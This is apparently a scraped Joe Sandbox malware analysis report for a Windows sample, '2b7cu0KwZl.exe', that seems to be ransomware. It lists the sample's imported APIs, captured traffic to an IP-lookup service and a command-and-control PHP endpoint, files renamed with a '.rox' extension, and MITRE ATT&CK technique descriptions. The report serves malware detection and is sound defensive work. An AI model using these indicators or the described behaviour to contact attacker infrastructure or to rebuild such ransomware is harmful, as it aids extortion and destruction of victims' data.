KERNEL32.dll	FindClose, WriteFile, CloseHandle, MoveFileW, GetCurrentProcess, GetSystemInfo, GetWindowsDirectoryA, GetPhysicallyInstalledSystemMemory, GetModuleFileNameW, GetVolumeNameForVolumeMountPointA, Sleep, OpenProcess, GetWindowsDirectoryW, K32GetModuleFileNameExW, FindFirstVolumeW, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, SetVolumeMountPointW, GetFileSizeEx, ReadFile, CreateFileW, SetFileAttributesW, SetFilePointerEx, TerminateProcess, HeapAlloc, HeapFree, GetProcessHeap, GetModuleHandleA, GetNativeSystemInfo, GetCurrentThread, LoadLibraryW, lstrcpyW, lstrcatW, GetUserDefaultLangID, FindFirstFileExW, FindNextFileW, GetFileAttributesW, lstrcmpW, WaitForSingleObject, CreateEventW, LocalFree, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetConsoleOutputCP, SetEndOfFile, FlushFileBuffers, HeapReAlloc, SetStdHandle, ReadConsoleW, GetConsoleMode, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, FlsFree, FlsSetValue, GetLocaleInfoA, GetLogicalDrives, GetTickCount, QueryPerformanceCounter, GetCurrentProcessId, GetLastError, GetCurrentThreadId, GetCommandLineW, GetTimeZoneInformation, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, RtlUnwind, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetComputerNameA, SetEvent, GetDiskFreeSpaceExA, HeapSize, WriteConsoleW, GetProcAddress, FlsGetValue, FlsAlloc, GetStdHandle, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WaitForSingleObjectEx, GetExitCodeThread, InitializeCriticalSectionEx, EncodePointer, DecodePointer, GetLocaleInfoEx, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, CompareStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileType
IPHLPAPI.DLL	GetAdaptersInfo
WINHTTP.dll	WinHttpQueryDataAvailable, WinHttpReadData, WinHttpConnect, WinHttpCloseHandle, WinHttpOpen, WinHttpCrackUrl, WinHttpOpenRequest, WinHttpSetOption, WinHttpAddRequestHeaders, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpQueryHeaders, WinHttpSetTimeouts
SHELL32.dll	ShellExecuteW, CommandLineToArgvW
ADVAPI32.dll	OpenServiceW, SetNamedSecurityInfoW, SetEntriesInAclW, FreeSid, AllocateAndInitializeSid, LookupPrivilegeValueW, AdjustTokenPrivileges, OpenThreadToken, QueryServiceStatusEx, OpenSCManagerW, EnumDependentServicesW, ControlService, CloseServiceHandle, GetUserNameA, GetTokenInformation, OpenProcessToken, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, CryptAcquireContextW, CryptGenRandom, CryptReleaseContext
RstrtMgr.DLL	RmRegisterResources, RmEndSession, RmStartSession, RmGetList

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 15:30:04.380172014 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:30:04.385126114 CET	80	49730	172.67.74.152	192.168.2.4
Nov 4, 2024 15:30:04.385209084 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:30:04.395804882 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:30:04.400989056 CET	80	49730	172.67.74.152	192.168.2.4
Nov 4, 2024 15:30:05.057939053 CET	80	49730	172.67.74.152	192.168.2.4
Nov 4, 2024 15:30:05.100512028 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:30:06.157620907 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:30:06.162602901 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:30:06.162805080 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:30:06.172935963 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:30:06.172935963 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:30:06.178112030 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:30:06.178128004 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:30:06.178149939 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:30:07.208616018 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:30:07.251529932 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:07.376976967 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:31:07.377121925 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:07.382396936 CET	80	49730	172.67.74.152	192.168.2.4
Nov 4, 2024 15:31:07.382471085 CET	49730	80	192.168.2.4	172.67.74.152
Nov 4, 2024 15:31:07.382992029 CET	80	49731	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:07.383094072 CET	49731	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:51.853750944 CET	49965	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:51.858691931 CET	80	49965	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:51.858839035 CET	49965	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:51.858916998 CET	49965	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:51.858952045 CET	49965	80	192.168.2.4	193.143.1.139
Nov 4, 2024 15:31:51.864013910 CET	80	49965	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:51.864027023 CET	80	49965	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:51.864037037 CET	80	49965	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:52.910808086 CET	80	49965	193.143.1.139	192.168.2.4
Nov 4, 2024 15:31:52.947748899 CET	49965	80	192.168.2.4	193.143.1.139

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 15:30:04.352828979 CET	60514	53	192.168.2.4	1.1.1.1
Nov 4, 2024 15:30:04.359925032 CET	53	60514	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 15:30:04.395804882 CET	200	OUT	GET / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Host: api.ipify.org
Nov 4, 2024 15:30:05.057939053 CET	434	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 14:30:04 GMT Content-Type: text/plain Content-Length: 14 Connection: keep-alive Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dd54cc8b82b6c68-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1263&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=200&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 Data Ascii: 173.254.250.69

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 15:30:06.172935963 CET	337	OUT	POST /Ujdu8jjooue/biweax.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=------------------------d1aRW4zbx Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1892 Host: 193.143.1.139
Nov 4, 2024 15:30:06.172935963 CET	1892	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 31 61 52 57 34 7a 62 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 65 72 73 69 6f 6e Data Ascii: --------------------------d1aRW4zbxContent-Disposition: form-data; name="version"1.0--------------------------d1aRW4zbxContent-Disposition: form-data; name="https_protocol"NO--------------------------d1aRW4zbxContent-Disposit
Nov 4, 2024 15:30:07.208616018 CET	244	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Mon, 04 Nov 2024 14:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.1.2-1ubuntu2.19 Vary: Accept-Encoding Data Raw: 34 0d 0a 47 6f 6f 64 0d 0a 30 0d 0a 0d 0a Data Ascii: 4Good0

Target ID:	0
Start time:	09:30:02
Start date:	04/11/2024
Path:	C:\Users\user\Desktop\2b7cu0KwZl.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\2b7cu0KwZl.exe"
Imagebase:	0x7ff746c10000
File size:	726'016 bytes
MD5 hash:	0D7E80EC85DB5CB45642235CB2381A0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2b7cu0KwZl.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Documents and Settings\All Users\.curlrc.rox (copy)

C:\Documents and Settings\All Users\Desktop\Adobe Acrobat.lnk.rox (copy)

C:\Documents and Settings\All Users\Desktop\Firefox.lnk.rox (copy)

C:\Documents and Settings\All Users\Desktop\Google Chrome.lnk.rox (copy)

C:\Documents and Settings\All Users\Microsoft OneDrive\setup\refcount.ini.rox (copy)

C:\Documents and Settings\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1.rox (copy)

C:\Documents and Settings\All Users\Microsoft\ClickToRun\DeploymentConfig.1.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd.rox (copy)

C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy)

C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.png.rox (copy)

Windows Analysis Report
2b7cu0KwZl.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre